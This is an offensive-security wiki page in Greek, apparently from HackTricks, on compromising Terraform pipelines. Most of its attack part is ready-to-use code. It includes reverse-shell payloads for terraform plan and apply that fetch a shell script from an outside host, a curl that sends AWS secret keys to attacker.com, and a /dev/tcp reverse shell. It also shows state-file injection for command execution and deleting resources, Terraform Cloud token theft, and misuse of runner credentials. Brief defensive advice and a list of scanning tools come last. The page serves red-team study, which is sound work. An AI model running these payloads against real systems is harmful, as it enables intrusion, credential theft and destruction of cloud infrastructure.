Terraform Ασφάλεια

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Βασικές Πληροφορίες

From the docs:

HashiCorp Terraform είναι ένα εργαλείο υποδομής ως κώδικα που σας επιτρέπει να ορίζετε πόρους στο cloud και on-prem σε αρχεία διαμόρφωσης αναγνώσιμα από άνθρωπο τα οποία μπορείτε να ελέγχετε με έκδοση, να επαναχρησιμοποιείτε και να μοιράζεστε. Στη συνέχεια μπορείτε να χρησιμοποιήσετε μια συνεπή ροή εργασίας για να προμηθεύετε και να διαχειρίζεστε όλη την υποδομή σας καθ’ όλη τη διάρκεια ζωής της. Το Terraform μπορεί να διαχειριστεί χαμηλού επιπέδου στοιχεία όπως compute, storage και networking resources, καθώς και υψηλού επιπέδου στοιχεία όπως DNS entries και SaaS features.

Πώς λειτουργεί το Terraform;

Το Terraform δημιουργεί και διαχειρίζεται πόρους σε cloud πλατφόρμες και άλλες υπηρεσίες μέσω των APIs τους. Οι providers επιτρέπουν στο Terraform να δουλεύει με σχεδόν οποιαδήποτε πλατφόρμα ή υπηρεσία με προσβάσιμο API.

Η HashiCorp και η κοινότητα του Terraform έχουν ήδη γράψει περισσότερους από 1700 providers για να διαχειριστούν χιλιάδες διαφορετικούς τύπους πόρων και υπηρεσιών, και αυτός ο αριθμός συνεχίζει να αυξάνεται. Μπορείτε να βρείτε όλους τους δημόσια διαθέσιμους providers στο Terraform Registry, συμπεριλαμβανομένων των Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, και πολλών άλλων.

Ο βασικός κύκλος εργασιών του Terraform αποτελείται από τρία στάδια:

  • Write: Ορίζετε πόρους, οι οποίοι μπορεί να βρίσκονται σε πολλαπλούς cloud providers και υπηρεσίες. Για παράδειγμα, μπορεί να δημιουργήσετε μια διαμόρφωση για την ανάπτυξη μιας εφαρμογής σε virtual machines μέσα σε ένα Virtual Private Cloud (VPC) με security groups και load balancer.
  • Plan: Το Terraform δημιουργεί ένα execution plan που περιγράφει την υποδομή που θα δημιουργήσει, θα ενημερώσει ή θα καταστρέψει με βάση την υπάρχουσα υποδομή και τη διαμόρφωσή σας.
  • Apply: Με έγκριση, το Terraform εκτελεί τις προτεινόμενες ενέργειες με τη σωστή σειρά, σεβόμενο τυχόν εξαρτήσεις πόρων. Για παράδειγμα, αν ενημερώσετε τις ιδιότητες ενός VPC και αλλάξετε τον αριθμό των virtual machines σε αυτό το VPC, το Terraform θα αναδημιουργήσει το VPC πριν κλιμακώσει τα virtual machines.

Terraform Lab

Απλώς εγκαταστήστε το terraform στον υπολογιστή σας.

Here you have a guide and here you have the best way to download terraform.

RCE in Terraform: config file poisoning

Terraform doesn’t have a platform exposing a web page or a network service we can enumerate, therefore, the only way to compromise terraform is to be able to add/modify terraform configuration files or to be able to modify the terraform state file (see chapter below).

However, terraform is a very sensitive component to compromise because it will have privileged access to different locations so it can work properly.

The main way for an attacker to be able to compromise the system where terraform is running is to compromise the repository that stores terraform configurations, because at some point they are going to be interpreted.

Actually, there are solutions out there that execute terraform plan/apply automatically after a PR is created, such as Atlantis:

Atlantis Security

If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed terraform plan or terraform apply.

Terraform plan

Terraform plan είναι η πιο χρησιμοποιούμενη εντολή στο terraform και developers/solutions που χρησιμοποιούν terraform την καλούν συνεχώς, οπότε ο πιο εύκολος τρόπος να πετύχετε RCE είναι να διασφαλίσετε ότι θα μολύνετε (poison) ένα terraform config file που θα εκτελέσει arbitrary εντολές σε ένα terraform plan.

Using an external provider

Το Terraform προσφέρει τον external provider ο οποίος παρέχει έναν τρόπο διεπαφής μεταξύ του Terraform και εξωτερικών προγραμμάτων. Μπορείτε να χρησιμοποιήσετε το external data source για να εκτελέσετε arbitrary code κατά τη διάρκεια ενός plan.

Injecting in a terraform config file something like the following will execute a rev shell when executing terraform plan:

data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}

Χρήση ενός custom provider

Ένας επιτιθέμενος θα μπορούσε να ανεβάσει έναν custom provider στο Terraform Registry και στη συνέχεια να τον προσθέσει στον κώδικα Terraform σε ένα feature branch (example from here):

terraform {
required_providers {
evil = {
source  = "evil/evil"
version = "1.0"
}
}
}

provider "evil" {}

Ο provider κατεβαίνει στο init και θα τρέξει τον κακόβουλο κώδικα όταν εκτελεστεί το plan

Μπορείτε να βρείτε ένα παράδειγμα στο https://github.com/rung/terraform-provider-cmdexec

Χρήση εξωτερικής αναφοράς

Και οι δύο αναφερθείσες επιλογές είναι χρήσιμες αλλά όχι πολύ διακριτικές (η δεύτερη είναι πιο διακριτική αλλά πιο περίπλοκη από την πρώτη). Μπορείτε να πραγματοποιήσετε αυτή την επίθεση με ακόμα πιο διακριτικό τρόπο, ακολουθώντας τις παρακάτω προτάσεις:

  • Αντί να προσθέσετε το rev shell απευθείας στο αρχείο terraform, μπορείτε να φορτώσετε έναν εξωτερικό πόρο που περιέχει το rev shell:
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}

You can find the rev shell code in https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules

  • Στο εξωτερικό resource, χρησιμοποιήστε τη δυνατότητα ref για να κρύψετε το terraform rev shell code in a branch μέσα στο repo, κάτι σαν: git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b

Terraform Apply

Terraform apply θα εκτελεστεί για να εφαρμόσει όλες τις αλλαγές — μπορείτε επίσης να το καταχραστείτε για να αποκτήσετε RCE εισάγοντας ένα κακόβουλο αρχείο Terraform με local-exec.
Απλώς πρέπει να βεβαιωθείτε ότι κάποιο payload όπως τα παρακάτω καταλήγει στο αρχείο main.tf:

// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}

// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}

Ακολούθησε τις προτάσεις από την προηγούμενη τεχνική για να πραγματοποιήσεις αυτή την επίθεση με πιο διακριτικό τρόπο χρησιμοποιώντας εξωτερικές αναφορές.

Secrets Dumps

Μπορείς να κάνεις τις τιμές μυστικών που χρησιμοποιεί το terraform να εξαχθούν εκτελώντας terraform apply προσθέτοντας στο terraform αρχείο κάτι σαν:

output "dotoken" {
value = nonsensitive(var.do_token)
}

Κατάχρηση αρχείων state του Terraform

Σε περίπτωση που έχετε δικαίωμα εγγραφής πάνω σε αρχεία state του Terraform αλλά δεν μπορείτε να αλλάξετε τον κώδικα του Terraform, this research δίνει μερικές ενδιαφέρουσες επιλογές για να αξιοποιήσετε το αρχείο. Ακόμη κι αν έχετε δικαίωμα εγγραφής στα config αρχεία, η χρήση του vector των state αρχείων είναι συχνά πολύ πιο ύπουλη, επειδή δεν αφήνετε ίχνη στο ιστορικό του git.

RCE in Terraform: config file poisoning

Είναι δυνατό να create a custom provider και απλά να αντικαταστήσετε έναν από τους providers στο terraform state file με τον κακόβουλο ή να προσθέσετε ένα ψεύτικο resource που αναφέρεται στον κακόβουλο provider.

Ο provider statefile-rce βασίζεται στην έρευνα και εξοπλίζει αυτήν την αρχή. Μπορείτε να προσθέσετε ένα ψεύτικο resource και να δηλώσετε την αυθαίρετη bash εντολή που θέλετε να εκτελεστεί στο attribute command. Όταν εκτελείται το terraform run, αυτό θα διαβαστεί και θα εκτελεστεί τόσο στο terraform plan όσο και στο terraform apply. Στην περίπτωση του terraform apply, το terraform θα διαγράψει το ψεύτικο resource από το state file μετά την εκτέλεση της εντολής σας, καθαρίζοντας πίσω τα ίχνη. Περισσότερες πληροφορίες και μια πλήρη demo υπάρχουν στο GitHub repository hosting the source code for this provider.

Για να το χρησιμοποιήσετε απευθείας, απλώς συμπεριλάβετε το ακόλουθο σε οποιαδήποτε θέση του resources array και προσαρμόστε τα attributes name και command:

{
"mode": "managed",
"type": "rce",
"name": "<arbitrary_name>",
"provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
"instances": [
{
"schema_version": 0,
"attributes": {
"command": "<arbitrary_command>",
"id": "rce"
},
"sensitive_attributes": [],
"private": "bnVsbA=="
}
]
}

Τότε, μόλις εκτελεστεί το terraform, ο κώδικάς σας θα εκτελεστεί.

Διαγραφή resources

Υπάρχουν 2 τρόποι για να καταστρέψετε resources:

  1. Εισάγετε ένα resource με τυχαίο όνομα στο state file που δείχνει στο πραγματικό resource προς καταστροφή

Επειδή το terraform θα δει ότι το resource δεν θα έπρεπε να υπάρχει, θα το καταστρέψει (ακολουθώντας το πραγματικό resource ID που έχει υποδειχθεί). Παράδειγμα από την προηγούμενη σελίδα:

{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},
  1. Τροποποιήστε τον πόρο ώστε να διαγραφεί με τρόπο που δεν είναι δυνατή η ενημέρωσή του (οπότε θα διαγραφεί και θα δημιουργηθεί ξανά)

Για ένα EC2 instance, η αλλαγή του τύπου του instance είναι αρκετή για να κάνει το terraform να το διαγράψει και να το δημιουργήσει ξανά.

Αντικατάσταση του blacklisted provider

Σε περίπτωση που συναντήσετε κατάσταση όπου hashicorp/external έχει βρεθεί σε blacklisted, μπορείτε να επανα-υλοποιήσετε τον external provider κάνοντας τα εξής. Σημείωση: Χρησιμοποιούμε ένα fork του external provider που έχει δημοσιευτεί στο https://registry.terraform.io/providers/nazarewk/external/latest. Μπορείτε επίσης να δημοσιεύσετε το δικό σας fork ή επαν-υλοποίηση.

terraform {
required_providers {
external = {
source  = "nazarewk/external"
version = "3.0.0"
}
}
}

Τότε μπορείτε να χρησιμοποιήσετε external όπως συνήθως.

data "external" "example" {
program = ["sh", "-c", "whoami"]
}

Terraform Cloud speculative plan RCE and credential exfiltration

Αυτό το σενάριο εκμεταλλεύεται τους Terraform Cloud (TFC) runners κατά τη διάρκεια των speculative plans για να pivot στο target cloud account.

  • Προϋποθέσεις:

  • Κλέψτε ένα Terraform Cloud token από μια μηχανή προγραμματιστή. Το CLI αποθηκεύει tokens σε απλό κείμενο στο ~/.terraform.d/credentials.tfrc.json.

  • Το token πρέπει να έχει πρόσβαση στην target organization/workspace και τουλάχιστον την άδεια plan. Τα VCS-backed workspaces μπλοκάρουν το apply από το CLI, αλλά εξακολουθούν να επιτρέπουν speculative plans.

  • Εντοπίστε ρυθμίσεις workspace και VCS μέσω του TFC API:

export TF_TOKEN=<stolen_token>
curl -s -H "Authorization: Bearer $TF_TOKEN" \
https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq
  • Προκαλέστε εκτέλεση κώδικα κατά τη διάρκεια ενός speculative plan χρησιμοποιώντας το external data source και το Terraform Cloud “cloud” block για να στοχεύσετε το VCS-backed workspace:
terraform {
cloud {
organization = "acmecorp"
workspaces { name = "gcp-infra-prod" }
}
}

data "external" "exec" {
program = ["bash", "./rsync.sh"]
}

Παράδειγμα rsync.sh για να αποκτήσετε ένα reverse shell στον TFC runner:

#!/usr/bin/env bash
bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1'

Εκτέλεσε ένα δοκιμαστικό σχέδιο για να εκτελέσεις το πρόγραμμα στον εφήμερο runner:

terraform init
terraform plan
  • Καταγράψτε και εξάγετε τα εγχυμένα cloud credentials από τον runner. Κατά τη διάρκεια των runs, το TFC εγχέει provider credentials μέσω αρχείων και environment variables:
env | grep -i gcp || true
env | grep -i aws || true

Αναμενόμενα αρχεία στον working directory του runner:

  • GCP:

  • tfc-google-application-credentials (Διαμόρφωση JSON για Workload Identity Federation)

  • tfc-gcp-token (βραχύβιο token πρόσβασης GCP)

  • AWS:

  • tfc-aws-shared-config (διαμόρφωση web identity/OIDC για ανάληψη ρόλου)

  • tfc-aws-token (βραχύβιο token · κάποιοι οργανισμοί μπορεί να χρησιμοποιούν στατικά κλειδιά)

  • Χρησιμοποίησε τα βραχύβια διαπιστευτήρια εκτός-καναλιού για να παρακάμψεις τα VCS gates:

GCP (gcloud):

export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials
gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS"
gcloud config set project <PROJECT_ID>

AWS (AWS CLI):

export AWS_CONFIG_FILE=./tfc-aws-shared-config
export AWS_PROFILE=default
aws sts get-caller-identity

Με αυτά τα creds, οι επιτιθέμενοι μπορούν να δημιουργήσουν/τροποποιήσουν/καταστρέψουν πόρους απευθείας χρησιμοποιώντας native CLIs, παρακάμπτοντας PR-based workflows που μπλοκάρουν το apply μέσω VCS.

  • Defensive guidance:
  • Apply least privilege to TFC users/teams and tokens. Audit memberships and avoid oversized owners.
  • Περιορίστε την άδεια plan σε ευαίσθητα VCS-backed workspaces όπου είναι εφικτό.
  • Επιβάλετε provider/data source allowlists με Sentinel policies για να μπλοκάρετε data "external" ή άγνωστους providers. Δείτε τις οδηγίες της HashiCorp για provider filtering.
  • Προτιμήστε OIDC/WIF αντί για στατικά cloud credentials· θεωρήστε τους runners ευαίσθητους. Παρακολουθήστε speculative plan runs και απρόσμενη egress.
  • Ανιχνεύστε exfiltration των tfc-* credential artifacts και ειδοποιήστε για ύποπτη χρήση του external προγράμματος κατά τη διάρκεια των plans.

Παραβίαση του Terraform Cloud

Χρήση token

As explained in this post, terraform CLI stores tokens in plaintext at ~/.terraform.d/credentials.tfrc.json. Η κλοπή αυτού του token επιτρέπει σε έναν επιτιθέμενο να μιμηθεί τον χρήστη εντός του scope του token.

Χρησιμοποιώντας αυτό το token, είναι δυνατό να αποκτήσετε το org/workspace με:

GET https://app.terraform.io/api/v2/organizations/acmecorp/workspaces/gcp-infra-prod
Authorization: Bearer <TF_TOKEN>

Τότε είναι δυνατό να εκτελεστεί αυθαίρετος κώδικας χρησιμοποιώντας terraform plan όπως εξηγήθηκε στο προηγούμενο κεφάλαιο.

Απόδραση στο cloud

Στη συνέχεια, αν ο runner βρίσκεται σε κάποιο cloud περιβάλλον, είναι δυνατό να αποκτηθεί ένα token του principal που είναι συνδεδεμένος με τον runner και να χρησιμοποιηθεί out of band.

  • GCP files (παρόντα στον τρέχοντα working directory της εκτέλεσης)

  • tfc-google-application-credentials — JSON config για Workload Identity Federation (WIF) που λέει στο Google πώς να ανταλλάξει την εξωτερική ταυτότητα.

  • tfc-gcp-token — βραχυπρόθεσμο (≈1 hour) GCP access token που αναφέρεται από το παραπάνω

  • AWS files

  • tfc-aws-shared-config — JSON για web identity federation/OIDC role assumption (προτιμώμενο σε σχέση με στατικά κλειδιά).

  • tfc-aws-token — βραχυπρόθεσμο token, ή ενδεχομένως στατικά IAM keys εάν είναι λανθασμένα διαμορφωμένα.

Εργαλεία Αυτόματου Ελέγχου

Snyk Infrastructure as Code (IaC)

Η Snyk προσφέρει μια ολοκληρωμένη λύση σάρωσης Infrastructure as Code (IaC) που εντοπίζει ευπάθειες και λανθασμένες διαμορφώσεις σε Terraform, CloudFormation, Kubernetes, και άλλες μορφές IaC.

  • Χαρακτηριστικά:
  • Σάρωση σε πραγματικό χρόνο για ευπάθειες ασφάλειας και ζητήματα συμμόρφωσης.
  • Ενσωμάτωση με συστήματα ελέγχου έκδοσης (GitHub, GitLab, Bitbucket).
  • Αυτοματοποιημένα pull requests επιδιόρθωσης.
  • Λεπτομερείς συμβουλές αποκατάστασης.
  • Εγγραφή: Δημιουργήστε έναν λογαριασμό στο Snyk.
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code

Checkov

Checkov είναι ένα εργαλείο στατικής ανάλυσης κώδικα για infrastructure as code (IaC) και επίσης ένα εργαλείο software composition analysis (SCA) για εικόνες και πακέτα ανοιχτού κώδικα.

Σαρώνει υποδομές cloud που παρέχονται χρησιμοποιώντας Terraform, Terraform plan, Cloudformation, AWS SAM, Kubernetes, Helm charts, Kustomize, Dockerfile, Serverless, Bicep, OpenAPI, ARM Templates, or OpenTofu και ανιχνεύει σφάλματα διαμόρφωσης που αφορούν την ασφάλεια και τη συμμόρφωση χρησιμοποιώντας graph-based scanning.

Εκτελεί Software Composition Analysis (SCA) scanning το οποίο είναι σάρωση πακέτων ανοιχτού κώδικα και εικόνων για Common Vulnerabilities and Exposures (CVEs).

pip install checkov
checkov -d /path/to/folder

terraform-compliance

From the docs: terraform-compliance είναι ένα ελαφρύ πλαίσιο δοκιμών εστιασμένο στην ασφάλεια και τη συμμόρφωση για το terraform, που επιτρέπει τη δυνατότητα αρνητικής δοκιμής για την υποδομή-ως-κώδικα σας.

  • compliance: Διασφαλίζει ότι ο υλοποιημένος κώδικας ακολουθεί πρότυπα ασφάλειας και τα δικά σας προσαρμοσμένα πρότυπα
  • behaviour driven development: Έχουμε BDD για σχεδόν τα πάντα, γιατί όχι και για IaC ;
  • portable: απλώς εγκαταστήστε το από pip ή τρέξτε το μέσω docker. See Installation
  • pre-deploy: επικυρώνει τον κώδικά σας πριν αναπτυχθεί
  • easy to integrate: μπορεί να τρέξει στο pipeline σας (ή σε git hooks) για να διασφαλίσει ότι όλες οι αναπτύξεις είναι επικυρωμένες.
  • segregation of duty: μπορείτε να κρατήσετε τα tests σας σε διαφορετικό repository όπου μια ξεχωριστή ομάδα είναι υπεύθυνη.

Note

Δυστυχώς, εάν ο κώδικας χρησιμοποιεί κάποιους providers στους οποίους δεν έχετε πρόσβαση, δεν θα μπορείτε να εκτελέσετε το terraform plan και να τρέξετε αυτό το εργαλείο.

pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder

tfsec

Από τα docs: το tfsec χρησιμοποιεί στατική ανάλυση του terraform κώδικά σας για να εντοπίσει πιθανές λανθασμένες ρυθμίσεις.

  • ☁️ Ελέγχει για λανθασμένες ρυθμίσεις σε όλους τους μεγάλους (και κάποιους μικρότερους) παρόχους cloud
  • ⛔ Εκατοντάδες ενσωματωμένοι κανόνες
  • 🪆 Σκανάρει modules (τοπικά και απομακρυσμένα)
  • ➕ Αξιολογεί εκφράσεις HCL καθώς και literal τιμές
  • ↪️ Αξιολογεί Terraform functions π.χ. concat()
  • 🔗 Αξιολογεί σχέσεις μεταξύ Terraform resources
  • 🧰 Συμβατό με το Terraform CDK
  • 🙅 Εφαρμόζει (και εμπλουτίζει) user-defined Rego policies
  • 📃 Υποστηρίζει πολλαπλές μορφές εξόδου: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
  • 🛠️ Ρυθμιζόμενο (μέσω CLI flags και/ή αρχείου config)
  • ⚡ Πολύ γρήγορο, ικανό να σκανάρει γρήγορα τεράστια repositories
brew install tfsec
tfsec /path/to/folder

terrascan

Το Terrascan είναι ένας στατικός code analyzer για Infrastructure as Code. Το Terrascan σας επιτρέπει:

  • Σαρώνει απρόσκοπτα την infrastructure as code για λανθασμένες ρυθμίσεις.
  • Παρακολουθεί την παρεχόμενη cloud infrastructure για αλλαγές στη διαμόρφωση που εισάγουν posture drift, και επιτρέπει την επαναφορά σε ασφαλή κατάσταση.
  • Εντοπίζει ευπάθειες ασφαλείας και παραβιάσεις συμμόρφωσης.
  • Μειώνει τους κινδύνους πριν την παροχή cloud native infrastructure.
  • Προσφέρει ευελιξία για εκτέλεση τοπικά ή ενσωμάτωση με το CI\CD σας.
brew install terrascan
terrascan scan -d /path/to/folder

KICKS

Εντοπίστε ευπάθειες ασφαλείας, ζητήματα συμμόρφωσης και λανθασμένες διαμορφώσεις υποδομής νωρίς στον κύκλο ανάπτυξης της infrastructure-as-code σας με το KICS από την Checkmarx.

KICS σημαίνει Keeping Infrastructure as Code Secure, είναι ανοιχτού κώδικα και απαραίτητο για κάθε cloud native project.

docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"

Terrascan

From the docs: Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:

  • Σάρωση του Infrastructure as Code για λανθασμένες διαμορφώσεις.
  • Παρακολούθηση της provisioned cloud υποδομής για αλλαγές διαμόρφωσης που εισάγουν posture drift, και δυνατότητα επαναφοράς σε ασφαλή κατάσταση.
  • Ανίχνευση ευπαθειών ασφαλείας και παραβάσεων συμμόρφωσης.
  • Μείωση κινδύνων πριν την προμήθεια cloud native υποδομής.
  • Προσφέρει ευελιξία για εκτέλεση τοπικά ή ενσωμάτωση με το CI\CD σας.
brew install terrascan

Αναφορές

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks